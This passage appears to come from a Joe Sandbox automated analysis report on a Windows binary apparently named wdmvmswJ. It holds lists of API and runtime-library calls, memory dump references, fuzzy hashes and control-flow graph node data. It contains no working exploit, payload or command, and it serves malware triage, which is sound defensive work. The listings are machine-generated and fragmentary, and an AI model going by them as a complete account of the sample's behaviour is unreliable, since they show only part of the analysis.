                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,20A11908), ref: 004170C5
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                                                                                                                                                                                                                                          • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                                                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                                                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3809854901-0

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _malloc$AllocHeap
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 1.2.3
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1883755663-2310465506

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3886058894-0

Control-flow Graph

APIs
• EntryPoint.WDMVMSWJ(80070057), ref: 004017EE
  • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,2C2D8410), ref: 0040101C
  • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
• EntryPoint.WDMVMSWJ(80070057), ref: 00401800
• EntryPoint.WDMVMSWJ(80070057), ref: 00401813
• __recalloc.LIBCMT ref: 00401828
• EntryPoint.WDMVMSWJ(8007000E), ref: 00401839
• EntryPoint.WDMVMSWJ(8007000E), ref: 00401853
• _calloc.LIBCMT ref: 00401861
Memory Dump Source
• Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
Yara matches
Similarity
• API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
• String ID:
• API String ID: 1721462702-0

Control-flow Graph

APIs
• __getptd.LIBCMT ref: 00414744
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __getptd.LIBCMT ref: 0041475B
• __amsg_exit.LIBCMT ref: 00414769
• __lock.LIBCMT ref: 00414779
Strings
Memory Dump Source
• Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID: @.B
• API String ID: 3521780317-470711618

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 605 40c73d-40c743 call 40e1d8 609 40c6c7-40c6df call 40fb29 call 40fa20 605->609 610 40c6ac-40c6c5 call 40bfc1 call 40e744 605->610 620 40c6e1-40c6eb call 40fa20 609->620 621 40c70f 609->621 619 40c72c-40c731 call 40e21d 610->619 620->621 629 40c6ed-40c70d call 40fa20 * 2 620->629 622 40c714-40c72a call 40c735 621->622 622->619 629->622
APIs
• __lock_file.LIBCMT ref: 0040C6C8
• __fileno.LIBCMT ref: 0040C6D6
• __fileno.LIBCMT ref: 0040C6E2
• __fileno.LIBCMT ref: 0040C6EE
• __fileno.LIBCMT ref: 0040C6FE
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
Yara matches
Similarity
• API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
• String ID:
• API String ID: 2805327698-0

APIs
• __getptd.LIBCMT ref: 00413FD8
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __amsg_exit.LIBCMT ref: 00413FF8
• __lock.LIBCMT ref: 00414008
• InterlockedDecrement.KERNEL32(?,00421490,0000000C,0040ECE6,20A11908,?,0040ED21,?), ref: 00414025
• InterlockedIncrement.KERNEL32(20A116A8,00421490,0000000C,0040ECE6,20A11908,?,0040ED21,?), ref: 00414050
Memory Dump Source
• Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
Yara matches
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
Strings
Memory Dump Source
• Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• API String ID: 1646373207-3105848591
APIs
• lstrlenA.KERNEL32(?), ref: 00401906
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
• GetLastError.KERNEL32 ref: 00401940
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
Memory Dump Source
• Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLastlstrlen
• String ID:
• API String ID: 3322701435-0
APIs
• __fileno.LIBCMT ref: 0040C77C
• __locking.LIBCMT ref: 0040C791
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
Yara matches
Similarity
• API ID: __decode_pointer__fileno__getptd_noexit__locking
• String ID:
• API String ID: 2395185920-0
APIs
Memory Dump Source
• Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
Yara matches
Similarity
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0
APIs
• __flush.LIBCMT ref: 0040BB6E
• __fileno.LIBCMT ref: 0040BB8E
• __locking.LIBCMT ref: 0040BB95
• __flsbuf.LIBCMT ref: 0040BBC0
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3240763771-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                                                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:3.9%
                                                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:11
18662->18664 18663->18644 18665 1e5f0 18663->18665 18664->18630 18666 1e64b 18664->18666 18667 19ef2 459 API calls 18665->18667 18668 1ec2e 448 API calls 18666->18668 18669 1e5f9 18667->18669 18668->18665 18669->18630 21100 22081 18669->21100 18673 1790c 448 API calls 18672->18673 18674 163dc 18673->18674 18675 34840 GetStdHandle 18674->18675 18676 163bd 448 API calls 18675->18676 18677 3485e 18676->18677 18678 348c5 18677->18678 18679 1dd98 6 API calls 18677->18679 18680 19950 448 API calls 18678->18680 18682 3486b 18679->18682 18681 348cf 18680->18681 18681->18465 18683 348b5 18682->18683 18684 34878 FlushConsoleInputBuffer _getch 18682->18684 18685 34799 448 API calls 18683->18685 18684->18678 18686 34891 EnterCriticalSection LeaveCriticalSection 18684->18686 18685->18678 18686->18678 22581 21ea6 18687->22581 18689 21e7c 18690 21e82 18689->18690 18691 18bc7 446 API calls 18689->18691 18690->18465 18692 21e92 GetProcessHeap RtlFreeHeap 18691->18692 18692->18690 18694 1ddbd 18693->18694 18695 1ddca 18693->18695 18694->18477 18696 1ddd6 GetStdHandle 18695->18696 18697 1ddde AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18695->18697 18696->18697 18697->18694 22589 2643a NtOpenThreadToken 18698->22589 18701 31ef3 RtlNtStatusToDosError SetLastError 18704 31f01 18701->18704 18702 26302 18703 31f51 18702->18703 18702->18704 18705 26319 18702->18705 18708 31f59 GetConsoleTitleW 18703->18708 18706 1ab7f 2 API calls 18704->18706 18722 31fdc 18704->18722 22598 2640a FormatMessageW 18705->22598 18728 26395 18706->18728 18709 31f79 wcsstr 18708->18709 18712 263c1 18708->18712 18709->18712 18713 31f92 18709->18713 18710 31f3d 18716 178e4 448 API calls 18710->18716 18711 263d8 18717 263e2 LocalFree 18711->18717 18718 263e9 18711->18718 18712->18711 18715 1dc60 2 API calls 18712->18715 18712->18722 18714 31fa0 wcsstr 18713->18714 18714->18712 18714->18714 18715->18711 18720 31f4a 18716->18720 18717->18718 18718->18710 18721 263f1 18718->18721 18719 26332 18719->18710 
18719->18711 18725 1dcd0 448 API calls 18719->18725 18720->18488 18723 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18721->18723 18726 26400 18723->18726 18724 263b4 SetConsoleTitleW 18724->18712 18727 26369 18725->18727 18726->18488 18727->18708 18727->18711 18727->18728 18728->18710 18728->18712 18728->18724 18730 1a9e6 18729->18730 18731 18854 18729->18731 18732 1a9ee GetProcessHeap RtlAllocateHeap 18730->18732 18735 18b96 GetProcessHeap HeapAlloc 18731->18735 18733 1aa11 FreeEnvironmentStringsW 18732->18733 18734 1aa06 memcpy 18732->18734 18733->18731 18734->18733 18736 2b5ce 18735->18736 18737 18bb4 18735->18737 18736->18538 18738 1a9d4 5 API calls 18737->18738 18739 18bb9 18738->18739 18740 2b5b2 GetProcessHeap RtlFreeHeap 18739->18740 18741 18bc3 18739->18741 18742 178e4 448 API calls 18740->18742 18741->18538 18742->18736 18763 18282 18743->18763 18744 182bd RegOpenKeyExW 18745 182e1 RegQueryValueExW 18744->18745 18744->18763 18746 18321 RegQueryValueExW 18745->18746 18745->18763 18748 18371 RegQueryValueExW 18746->18748 18746->18763 18747 18552 time srand 18749 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18747->18749 18751 183ab RegQueryValueExW 18748->18751 18748->18763 18752 18570 GetCommandLineW 18749->18752 18750 2b11a _wtol 18750->18746 18754 183fb RegQueryValueExW 18751->18754 18751->18763 18752->18541 18753 2b146 _wtol 18753->18748 18756 1846c RegQueryValueExW 18754->18756 18754->18763 18755 2b18e _wtol 18755->18751 18756->18763 18757 2b1ba wcstol 18757->18763 18758 2b1dc wcstol 18758->18763 18759 2b218 wcstol 18759->18763 18760 184fa RegQueryValueExW 18761 18534 RegCloseKey 18760->18761 18760->18763 18761->18763 18762 2b28c ExpandEnvironmentStringsW 18762->18763 18763->18744 18763->18746 18763->18747 18763->18748 18763->18750 18763->18751 18763->18753 18763->18754 18763->18755 18763->18756 18763->18757 18763->18758 18763->18759 18763->18760 18763->18761 18763->18762 19068 1acb0 18763->19068 19078 26e25 18765->19078 
18767 21a27 18768 1889a 18767->18768 18769 21a2f memset 18767->18769 18768->18542 18768->18547 18769->18768 18771 1e405 18770->18771 18772 188d9 18770->18772 18773 26e25 4 API calls 18771->18773 18772->18542 18772->18553 18774 1e422 18773->18774 18775 2dc4a 18774->18775 18776 1e42d 18774->18776 19090 334d4 18775->19090 18777 1e441 memset 18776->18777 18778 2dc6b ??_V@YAXPAX 18776->18778 18777->18772 18782 18ec1 GetCurrentDirectoryW 18781->18782 18783 18ede towupper 18781->18783 18784 18ec9 18782->18784 19160 1ec2e GetEnvironmentVariableW 18783->19160 18786 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18784->18786 18788 188fc 18786->18788 18790 200e9 memset 18788->18790 18789 2b787 towupper 18791 1e3f0 17 API calls 18790->18791 18792 2013e 18791->18792 18793 20146 18792->18793 18794 2e615 18792->18794 18796 20151 GetModuleFileNameW 18793->18796 18797 2e627 18793->18797 18795 21e70 448 API calls 18794->18795 18799 2e61f exit 18794->18799 18795->18794 18798 1ec2e 448 API calls 18796->18798 19303 1a976 18797->19303 18800 20168 18798->18800 18799->18797 18800->18797 18802 20170 18800->18802 18804 1ec2e 448 API calls 18802->18804 18803 2e63e 18807 1a976 8 API calls 18803->18807 18805 2017c 18804->18805 18805->18803 18806 20184 18805->18806 18808 1ec2e 448 API calls 18806->18808 18810 2e64f 18807->18810 18809 20190 18808->18809 18809->18810 18813 1a976 8 API calls 18810->18813 19065 27d1d 19064->19065 19066 21e70 448 API calls 19065->19066 19067 27d28 exit 19065->19067 19066->19065 19069 1acc0 19068->19069 19069->19069 19072 1dcd0 19069->19072 19071 1acd8 19071->18763 19073 2d9da 19072->19073 19074 1dcde GetProcessHeap HeapAlloc 19072->19074 19076 178e4 446 API calls 19073->19076 19074->19073 19075 1dcf6 19074->19075 19075->19071 19077 2d9e3 19076->19077 19077->19071 19079 26e30 __EH_prolog3_catch 19078->19079 19082 2742d 19079->19082 19081 26e48 19081->18767 19083 27441 malloc 19082->19083 19084 27434 _callnewh 19083->19084 19085 2744f 19083->19085 
